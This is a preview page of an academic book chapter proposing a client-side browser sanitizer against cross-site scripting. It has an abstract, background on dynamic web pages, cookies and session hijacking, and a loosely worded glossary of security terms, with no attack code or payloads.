BDS: Browser Dependent XSS Sanitizer

BDS: Browser Dependent XSS Sanitizer

Shashank Gupta (National Institute of Technology Kurukshtra, India) and B. B. Gupta (National Institute of Technology Kurukshtra, India)
DOI: 10.4018/978-1-4666-6559-0.ch008


Cross-Site Scripting (XSS) attack is a vulnerability on the client-side browser that is caused by the improper sanitization of the user input embedded in the Web pages. Researchers in the past had proposed various types of defensive strategies, vulnerability scanners, etc., but still XSS flaws remains in the Web applications due to inadequate understanding and implementation of various defensive tools and strategies. Therefore, in this chapter, the authors propose a security model called Browser Dependent XSS Sanitizer (BDS) on the client-side Web browser for eliminating the effect of XSS vulnerability. Various earlier client-side solutions degrade the performance on the Web browser side. But in this chapter, the authors use a three-step approach to bypass the XSS attack without degrading much of the user's Web browsing experience. While auditing the experiments, this approach is capable of preventing the XSS attacks on various modern Web browsers.
Chapter Preview


In the recent times of World Wide Web (WWW), static web pages were used on the web server side for responding the request of various users. As the name signifies the sense, these web pages generally provides the content in response web page as it is stored on a web server. These web pages are suitable for such type of content that rarely or never needs to be updated. Though, static web pages had no major security concerns. However preserving large amount of static web pages on the web server side is unfeasible without automated tools. Therefore the performance of the web server with static web pages becomes a bottleneck.

On the other hand, in order to increase the readability and enhancement of the web page, the web application comes into the era of dynamic web pages. These web pages are designed in such a way to meet the personalized and up to date information to the client. Dynamic web pages generally provide the web content in a response web page based on the user supplied input. Client’s web browser sends the HTTP request by initiating an interaction with the web server. The web server will collect the data from various resources and assembled into one web page and finally transmit it to the web browser. There are many tools (like bulletin boards, search engines, login forms etc) available in the dynamic web pages which demands the interaction between the web server and user.

Apart from these useful features of dynamic web pages, these web pages also allow the attackers to embed the malicious code as well. When such types of malicious codes are executed by web browser, then the user has to compromise various types of credential resources (e.g. cookie, credit card numbers etc.). In the present era, the modern dynamic web application assures the security of some of the important credentials of a user (like user-id and password). However, there are some other sensitive credentials (e.g. cookies) which are the best possible targets for the attackers. If such credentials are compromised by an attacker, then he can simply hijack the victim’s session, access the confidential resources of its web application etc.

Cross-Site Scripting (XSS) (Alfaro et al., 2007) is one of such vulnerability which is generally caused by the improper sanitization of user input. The web server processes the information without checking for the vulnerable code injected in it and displays this vulnerable content in the web page and sends it the web browser. The web browser executes this vulnerable code and transfers its credential resources to the attacker’s domain. The main goal of XSS attack is to steal the cookies of the victim’s web browser and redirect it to the attacker’s web application. Later on the attacker can use this cookie to access the sensitive resources of the web application of victim.

Hyper Text Transfer Protocol (HTTP) (Gourley et al., 2002) is a client/server based internet protocol which is generally used for information exchange between the client and server. Although, it is a stateless protocol, therefore it does not store any information regarding the session initiated by the client and web server. It also does not guarantee that the HTTP requests and corresponding HTTP responses are shared by the same user or not. Therefore this protocol cannot prove the authenticity of the user using the internet. To overcome this problem, cookies comes into picture, which are simply text files generated on the web server side.

Cookie is generally shared between the web browser and web server. The main goal of sharing the cookie file between the web server and web browser is to maintain the continuity between them. The web applications generally use cookies to provide a mechanism for creating state full HTTP sessions. The cookies are supported by nearly all up to date web browsers and therefore allow for a greater flexibility in how user sessions are maintained by the web applications. For web applications that need authentication, they frequently use cookies to store the session Ids (Kristol, 2000) and then pass the cookies to the users after they have been authenticated. The cookies are stored in the user’s web browser. The web browser returns the cookies every time it needs to reconnect as a part of an active session and then the web application associates the cookies with the user. The following Figure 1 shows the scenario of cookie sharing between the web browser and web server.

Figure 1.

Cookie file sharing between the Web browser and Web server

Key Terms in this Chapter

Session Hijacking: It is a form of attack in which an attacker seizes the valid session token from the network and thus acquiring the access to the confidential resources of the web application. This attack can result in man-in-middle-attacks etc.

Cookies: Cookies are generally small text files which are generally stored in the directory of web browser. These are generally produced on the web server side whenever a user browses a particular website. The web site uses them in order to verify the identity of the web user, keeps track of movements of the user within the website etc.

Virus: It is an infected program which when executes self replicates in other parts of the program, corrupt or delete various important files etc.. Its effects acquire lot amout of useful memory and also produces a halt in the system.

HTTPS: (Hyper Text Transfer Protocol Secure) is in reality not a protocol but it is just a result of coating the HTTP protocol on the top of SSL protocol, therefore including the security features to the HTTP protocol. The main inspiration of HTTPs is to avoid various types of vulnerabilities like man-in-the-middle attack etc.

MAC Address: It is physical address of a computer on the network which uniquely identifies each computer in the network.

Hyperlink: A hyperlink or normally known as a link is technique of shifting from one web page to other linked web page (or some other document, text, image etc.).

Client: A client is a computer which generally forward the request or receiving the response from the server. Therefore a client is a commodity which utilizes the services made available by the server. A server can also be a client for some other server.

Software: It is a collection of computer programs (which are installed and stored on the hardware) designed to perform an automated task.

Web Browser: It is a program (application software) which is used on the client side machine for extracting, delivering and displaying the information on the World Wide Web (WWW). It is also used for navigation from one web page to other, displaying web pages, accessing e-mails etc.

ARP: (Address Resolution Protocol) is a type of protocol which is normally used to map a computer IP address to its MAC address (also called physical address).

Zero Day Exploit: An exploit that takes benefit of a security risk on the same day, or before, the risk becomes public. This attacks can be extremely dangerous because they take advantage of security holes for which solution is currently not available.

Port Number: It is an address which uniquely each process of an end destination ( These port numbers are normally used in the transport layer of OSI model.

HTTP: (Hyper Text Transfer Protocol) is an application protocol used by the internet technology for transferring various kinds of files (e.g. text: images, audio, video and other multimedia files) on the World Wide Web (WWW).

Spyware: It is a program that normally move towards the computer and keeps track of the online activity of user. Spyware can also be installed automatically without the user’s consent while installing the other softwares.

Java Script: It is dynamic programming language which is included as a part of HTML files. Its main theme of introductuction in the source code of HTML is to increase the readability and enhancement of web pages. Its implementation can control the web browser and modifies the web page that is displayed.

Encryption: It is a technique of mapping a readable text to non-readable text form in order to protect the privacy of an information.

Web Server: It is simply a program that fulfills the request of web page coming from the web browser side. These are simply hardware or softwares that delivers the web pages to the requested party. Normally web servers are used for data storage of various enterprises, hosting web sites etc.

XSS Attack: Cross-Site Scripting (XSS) attack is generally found in modern web applications whose main goal is to access the sensitive resources (e.g. cookies) of a client’s web browser by simply injecting the poorly written scripts into the web pages which are accessed or viewed by other users.

Integrity: It is the property by which we can validate that the information contained in any document has altered or not.

Wiretapping: It is a technique of observing and analyzing the flow of data in a network in an active or passive mode. The attack can perform denial of service attack by executing wiretapping.

URL: (Uniform Resource Locator) is a unique address (web address) in the form of a string which is generally used to access the web pages on an internet. These addresses normally define the location of the resources on the network.

Malicious Code: It is such type of code which looks like a legitimate one but it is intended to produce undesirable results (like stealing cookies or credit card numbers etc.).

Malware: It is any type of malicious software or a program created to access unauthorized use of information or produces undesirable results. Any type of computer virus is a malware.

Spoofing: It is a malicious technique of flooding false IP addresses on the network and hence acquiring the unauthorized access to the system. For.e.g. caller id spoofing: normally telephone calls are uniquely identified by the names and contact number. But advanced technology can forge a caller id information and display a wrong name and phone number.

Pop-Up Messages: It is a type of an online alert or a message usually seen in a small message box on the compter screen. Various types of e-mail alerts, warnings etc. are displayed in the form of pop-up messages.

Eavesdropping: It is the process of illegal interception of packets transmitted by other computers from a network. It is also known as sniffing, whose main motto is to confidentially listening the other’s information without their permission.

WWW: (World Wide Web) is an alternative way to use the capabilities of Internet. It basically provides a connectivity to interlinked hypertext documents, machines on the internet.

HTML: (HyperTextMarkupLanguage) is a language used on the World Wide Web (WWW) which is generally used to craft web pages. This language is normally used for marking text files to attain colour, font, graphics, links to other web pages etc.

Complete Chapter List

Search this Book: